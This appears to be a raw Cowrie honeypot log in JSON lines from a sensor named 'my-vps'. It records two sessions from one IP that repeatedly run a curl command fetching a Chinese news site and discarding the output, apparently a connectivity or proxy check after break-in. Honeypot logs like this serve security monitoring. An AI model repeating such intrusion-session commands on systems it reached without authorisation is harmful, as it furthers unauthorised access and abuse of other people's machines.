{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.630603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.634649Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.635865Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.638635Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.654565Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.658242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.659066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.662186Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.666359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.667120Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.671048Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.681283Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.683887Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.687462Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.688848Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.691447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.695715Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.696373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.706614Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.707457Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.711412Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.716736Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.723214Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.733366Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.735176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.736276Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.745505Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.746216Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.767108Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.780813Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.781643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.789626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.790304Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.817288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.818037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.829397Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.830186Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.854392Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.855157Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.870827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.871518Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.890738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.891495Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.911997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.912793Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.923945Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.925937Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.926726Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.947179Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.954114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.954894Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.971988Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.976569Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.977283Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:27.999687Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.000524Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.005311Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.006762Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.013781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.014462Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.019289Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.035900Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.041965Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.042965Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.043609Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.047469Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.050072Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.053317Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.055318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.056187Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.063727Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.082332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.083116Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.091663Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.092380Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.104993Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.124504Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.125335Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.129868Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.131024Z","src_ip":"212.227.125.160","session":"7541ed730449"}
